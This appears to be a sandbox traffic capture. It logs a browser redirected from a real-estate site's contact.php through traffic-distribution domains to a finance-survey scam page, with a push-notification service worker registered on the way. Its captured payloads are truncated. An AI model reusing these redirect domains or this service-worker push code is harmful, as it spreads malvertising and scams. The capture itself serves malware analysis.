                                                                                                          2025-01-06 11:09:10 UTC364OUTGET /includes/contact.php HTTP/1.1
                                                                                                          Host: bohlepropiedades.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:11 UTC151INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:09 GMT
                                                                                                          Server: Apache
                                                                                                          Connection: close
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Content-Type: application/json
                                                                                                          2025-01-06 11:09:11 UTC145INData Raw: 38 36 0d 0a 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 75 6d 62 72 65 6c 6c 61 6c 61 6e 64 2e 66 69 74 5c 2f 3f 73 6c 3d 35 38 37 39 39 30 35 2d 30 30 33 31 63 26 70 75 62 5f 63 6c 69 63 6b 5f 69 64 3d 7b 45 78 74 65 72 6e 61 6c 5f 49 44 5f 66 72 6f 6d 5f 74 72 61 66 66 69 63 5f 73 6f 75 72 63 65 7d 26 73 69 74 65 3d 7b 73 75 62 49 44 7d 26 70 75 62 5f 73 75 62 5f 69 64 3d 7b 73 75 62 5f 73 75 62 49 44 7d 22 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 86"https:\/\/www.umbrellaland.fit\/?sl=5879905-0031c&pub_click_id={External_ID_from_traffic_source}&site={subID}&pub_sub_id={sub_subID}"0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          11192.168.2.45004951.68.82.1474438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:10 UTC809OUTGET /?sl=5879905-0031c&pub_click_id={External_ID_from_traffic_source}&site={subID}&pub_sub_id={sub_subID} HTTP/1.1
                                                                                                          Host: www.umbrellaland.fit
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                          Sec-Fetch-User: ?1
                                                                                                          Sec-Fetch-Dest: document
                                                                                                          Referer: https://bohlepropiedades.com/
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:11 UTC196INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:11 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Cache-Control: no-transform
                                                                                                          Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                          2025-01-06 11:09:11 UTC4341INData Raw: 31 30 65 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 72 65 66 65 72 72 65 72 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22
                                                                                                          Data Ascii: 10ed<!DOCTYPE html><html> <head> <meta name="referrer" content="never"/> <meta name="referrer" content="no-referrer"/> <meta name="robots" content="noindex, nofollow"/> <noscript><meta http-equiv="refresh" content="
                                                                                                          2025-01-06 11:09:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          12192.168.2.45004851.68.82.1474438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:11 UTC912OUTGET /?sl=5879905-0031c&pub_click_id={External_ID_from_traffic_source}&site={subID}&pub_sub_id={sub_subID}&eyeg=945fb352f49cc318c0f7cbe195bc5eb5&eyer=0.4049684939698268&eyei=0&eyew=1280&eyeh=907&eyetd=210&eyef=bohlepropiedades.com HTTP/1.1
                                                                                                          Host: www.umbrellaland.fit
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                          Sec-Fetch-Dest: document
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:11 UTC355INHTTP/1.1 302 Found
                                                                                                          Date: Mon, 06 Jan 2025 11:09:11 GMT
                                                                                                          Content-Length: 0
                                                                                                          Connection: close
                                                                                                          Cache-Control: no-transform
                                                                                                          Location: https://www.terrificstrands.digital/click?offer_id=31275&pub_id=173475&pub_sub_sub_id=9&unique1=5879905-0031c&app=opt&app_store_id=ncd&pub_click_id={External_ID_from_traffic_source}&site={subID}&pub_sub_id={sub_subID}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          13192.168.2.450052188.114.96.34438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:12 UTC837OUTGET /click?offer_id=31275&pub_id=173475&pub_sub_sub_id=9&unique1=5879905-0031c&app=opt&app_store_id=ncd&pub_click_id={External_ID_from_traffic_source}&site={subID}&pub_sub_id={sub_subID} HTTP/1.1
                                                                                                          Host: www.terrificstrands.digital
                                                                                                          Connection: keep-alive
                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                          Sec-Fetch-Dest: document
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:12 UTC1034INHTTP/1.1 302 Found
                                                                                                          Date: Mon, 06 Jan 2025 11:09:12 GMT
                                                                                                          Content-Length: 0
                                                                                                          Connection: close
                                                                                                          access-control-allow-origin: *
                                                                                                          location: https://azz.underbellymeet.asia/?1=173475&utm_medium=7db74e7d269c2b1f030ec267c5b1a290488100f6&utm_campaign=maap24&cid=Bi0jftMAAAGUO0315QAAeisAAqWjAAAAAAAAAAAUAAABN2Y
                                                                                                          referrer-policy: no-referrer
                                                                                                          access-control-allow-methods: *
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VzJUFiC3mzZeSVgcvspkKy6PH1r9xpXFHwnV%2BU2cPz%2BgVZ%2FrJ5eqofbqeoYJRpeHsjhhzhZFH1hG2%2FrEoHftldv1QmzxvX1FGfkdI9bUmuu7RrxXfpa4dVrzhOkF3wcxw%2B6q5balRUQCB0NWbgo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb412898417c94-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2079&min_rtt=2074&rtt_var=781&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2859&recv_bytes=1415&delivery_rate=1407907&cwnd=240&unsent_bytes=0&cid=891f86b2a5c19e1d&ts=300&x=0"


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          14192.168.2.45005367.212.184.1484438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:13 UTC785OUTGET /?1=173475&utm_medium=7db74e7d269c2b1f030ec267c5b1a290488100f6&utm_campaign=maap24&cid=Bi0jftMAAAGUO0315QAAeisAAqWjAAAAAAAAAAAUAAABN2Y HTTP/1.1
                                                                                                          Host: azz.underbellymeet.asia
                                                                                                          Connection: keep-alive
                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                          Sec-Fetch-Dest: document
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:13 UTC497INHTTP/1.1 200 OK
                                                                                                          Server: nginx
                                                                                                          Date: Mon, 06 Jan 2025 11:09:13 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: no-store, no-cache, must-revalidate, max-age=0
                                                                                                          Pragma: no-cache
                                                                                                          Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                          Accept-CH: Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version
                                                                                                          Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                          Alt-Svc: h3=":443"; ma=604800; persist=1
                                                                                                          2025-01-06 11:09:13 UTC1196INData Raw: 34 61 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 33 32 30 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 3c 73 74 79 6c 65 20
                                                                                                          Data Ascii: 4a0<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Loading...</title><meta name="viewport" content="width=320,initial-scale=1" /><style


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          15192.168.2.45005467.212.184.1484438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:13 UTC974OUTGET /?utm_term=7456757949717807127&tid=57696e3332 HTTP/1.1
                                                                                                          Host: azz.underbellymeet.asia
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          sec-ch-ua-full-version: "117.0.5938.132"
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                                                          sec-ch-ua-model: ""
                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                          Sec-Fetch-Dest: document
                                                                                                          Referer: https://azz.underbellymeet.asia/?1=173475&utm_medium=7db74e7d269c2b1f030ec267c5b1a290488100f6&utm_campaign=maap24&cid=Bi0jftMAAAGUO0315QAAeisAAqWjAAAAAAAAAAAUAAABN2Y
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:14 UTC497INHTTP/1.1 200 OK
                                                                                                          Server: nginx
                                                                                                          Date: Mon, 06 Jan 2025 11:09:14 GMT
                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: no-store, no-cache, must-revalidate, max-age=0
                                                                                                          Pragma: no-cache
                                                                                                          Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                          Accept-CH: Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version
                                                                                                          Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                          Alt-Svc: h3=":443"; ma=604800; persist=1
                                                                                                          2025-01-06 11:09:14 UTC9330INData Raw: 32 34 36 35 0d 0a 20 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 41 50 46 4f 52 55 4d 2f 2f 44 54 44 20 58 48 54 4d 4c 20 4d 6f 62 69 6c 65 20 31 2e 30 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 61 70 66 6f 72 75 6d 2e 6f 72 67 2f 44 54 44 2f 78 68 74 6d 6c 2d 6d 6f 62 69 6c 65 31 30 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 22 3e 20 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63
                                                                                                          Data Ascii: 2465 <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=""> <head> <meta name="robots" content="noindex,nofollow" /> <meta name="viewport" c


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          16192.168.2.45005567.212.184.1484438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:14 UTC747OUTGET /favicon.ico HTTP/1.1
                                                                                                          Host: azz.underbellymeet.asia
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          sec-ch-ua-model: ""
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-full-version: "117.0.5938.132"
                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: image
                                                                                                          Referer: https://azz.underbellymeet.asia/?utm_term=7456757949717807127&tid=57696e3332
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:14 UTC415INHTTP/1.1 200 OK
                                                                                                          Server: nginx
                                                                                                          Date: Mon, 06 Jan 2025 11:09:14 GMT
                                                                                                          Content-Type: image/x-icon
                                                                                                          Content-Length: 1150
                                                                                                          Last-Modified: Fri, 11 Aug 2023 10:37:02 GMT
                                                                                                          Connection: close
                                                                                                          ETag: "64d60f4e-47e"
                                                                                                          Expires: Tue, 07 Jan 2025 11:09:14 GMT
                                                                                                          Cache-Control: max-age=86400
                                                                                                          Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                          Alt-Svc: h3=":443"; ma=604800; persist=1
                                                                                                          Accept-Ranges: bytes
                                                                                                          2025-01-06 11:09:14 UTC1150INData Raw: 00 00 01 00 01 00 10 10 00 00 01 00 20 00 68 04 00 00 16 00 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 12 0b 00 00 12 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 ad 3f 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 ad 40 87 49 ab 41 fe 48 ac 41 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                          Data Ascii: h( H?8I@IAHAi


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          17192.168.2.45005867.212.184.1484438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:14 UTC527OUTGET /sw.js?v=1736161752722 HTTP/1.1
                                                                                                          Host: azz.underbellymeet.asia
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: max-age=0
                                                                                                          Accept: */*
                                                                                                          Service-Worker: script
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: same-origin
                                                                                                          Sec-Fetch-Dest: serviceworker
                                                                                                          Referer: https://azz.underbellymeet.asia/?utm_term=7456757949717807127&tid=57696e3332
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:15 UTC490INHTTP/1.1 200 OK
                                                                                                          Server: nginx
                                                                                                          Date: Mon, 06 Jan 2025 11:09:14 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Content-Length: 2203
                                                                                                          Last-Modified: Mon, 18 Nov 2024 09:50:19 GMT
                                                                                                          Connection: close
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: "673b0ddb-89b"
                                                                                                          Content-Security-Policy: default-src * 'unsafe-inline' 'unsafe-eval'; script-src * 'unsafe-inline' 'unsafe-eval'; connect-src * 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src *; style-src * 'unsafe-inline';
                                                                                                          Accept-Ranges: bytes
                                                                                                          2025-01-06 11:09:15 UTC2203INData Raw: 2f 2a 20 67 6c 6f 62 61 6c 20 66 65 74 63 68 2c 20 50 72 6f 6d 69 73 65 20 2a 2f 0a 0a 73 65 6c 66 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 70 75 73 68 27 2c 20 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 76 61 72 20 46 45 45 44 5f 55 52 4c 20 3d 20 27 68 74 74 70 73 3a 2f 2f 66 65 65 64 2e 63 68 69 6d 75 6b 61 70 70 61 2e 63 6f 6d 2f 66 65 65 64 2e 70 68 70 3f 76 3d 31 37 33 31 39 32 33 33 39 38 26 65 70 3d 27 3b 0a 20 20 20 20 76 61 72 20 45 52 52 4f 52 5f 55 52 4c 20 3d 20 27 68 74 74 70 73 3a 2f 2f 66 65 65 64 2e 63 68 69 6d 75 6b 61 70 70 61 2e 63 6f 6d 2f 65 2e 70 68 70 3f 6d 3d 27 3b 0a 20 20 20 20 76 61 72 20 70 72 6f 6d 69 73 65 2c 20 64 61 74 61 2c 20 6f 70 74 69 6f 6e 73 3b 0a 0a 20 20 20 20 69 66 20 28 65 2e 64 61 74
                                                                                                          Data Ascii: /* global fetch, Promise */self.addEventListener('push', function(e) { var FEED_URL = 'https://feed.chimukappa.com/feed.php?v=1731923398&ep='; var ERROR_URL = 'https://feed.chimukappa.com/e.php?m='; var promise, data, options; if (e.dat


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          18192.168.2.45005967.212.184.1484438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:14 UTC358OUTGET /favicon.ico HTTP/1.1
                                                                                                          Host: azz.underbellymeet.asia
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:15 UTC415INHTTP/1.1 200 OK
                                                                                                          Server: nginx
                                                                                                          Date: Mon, 06 Jan 2025 11:09:15 GMT
                                                                                                          Content-Type: image/x-icon
                                                                                                          Content-Length: 1150
                                                                                                          Last-Modified: Fri, 11 Aug 2023 10:37:02 GMT
                                                                                                          Connection: close
                                                                                                          ETag: "64d60f4e-47e"
                                                                                                          Expires: Tue, 07 Jan 2025 11:09:15 GMT
                                                                                                          Cache-Control: max-age=86400
                                                                                                          Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                          Alt-Svc: h3=":443"; ma=604800; persist=1
                                                                                                          Accept-Ranges: bytes
                                                                                                          2025-01-06 11:09:15 UTC1150INData Raw: 00 00 01 00 01 00 10 10 00 00 01 00 20 00 68 04 00 00 16 00 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 12 0b 00 00 12 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 ad 3f 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 ad 40 87 49 ab 41 fe 48 ac 41 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                          Data Ascii: h( H?8I@IAHAi


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          19192.168.2.450060104.18.3.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:18 UTC758OUTGET /nwtrck?var_3=M7456757949717807127&ymid=2de718&var=615-538bd0d9&z=8645117 HTTP/1.1
                                                                                                          Host: juvuthoors.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                          Sec-Fetch-Dest: document
                                                                                                          Referer: https://azz.underbellymeet.asia/
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:18 UTC1289INHTTP/1.1 302 Found
                                                                                                          Date: Mon, 06 Jan 2025 11:09:18 GMT
                                                                                                          Content-Length: 0
                                                                                                          Connection: close
                                                                                                          Accept-Ch: Sec-CH-UA, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model
                                                                                                          Link: <https://propeller-tracking.com>; rel="preconnect dns-prefetch",<https://my.rtmark.net>; rel="preconnect dns-prefetch"
                                                                                                          Link: <https://wungoangeredsa.com>; rel="preconnect dns-prefetch",<https://propeller-tracking.com>; rel="preconnect dns-prefetch"
                                                                                                          Referrer-Policy: no-referrer
                                                                                                          Location: https://wungoangeredsa.com/finance-survey/272/?svar=1736161758&ssk=7cd32637808ffb7eb68676c4facb26c7&ssk2=6eef4467b47effe6659448a630f4cafb&s=900090192959910233&var=615-538bd0d9&ymid=2de718&z=8645117&var_3=M7456757949717807127&rdk=rk3
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Allow-Headers: Accept, Content-Type, Content-Length, Accept-Encoding
                                                                                                          Access-Control-Max-Age: 86400
                                                                                                          Pragma: no-cache
                                                                                                          Cache-Control: no-transform, no-store, no-cache, must-revalidate, max-age=0
                                                                                                          Expires: Tue, 11 Jan 1994 10:00:00 GMT
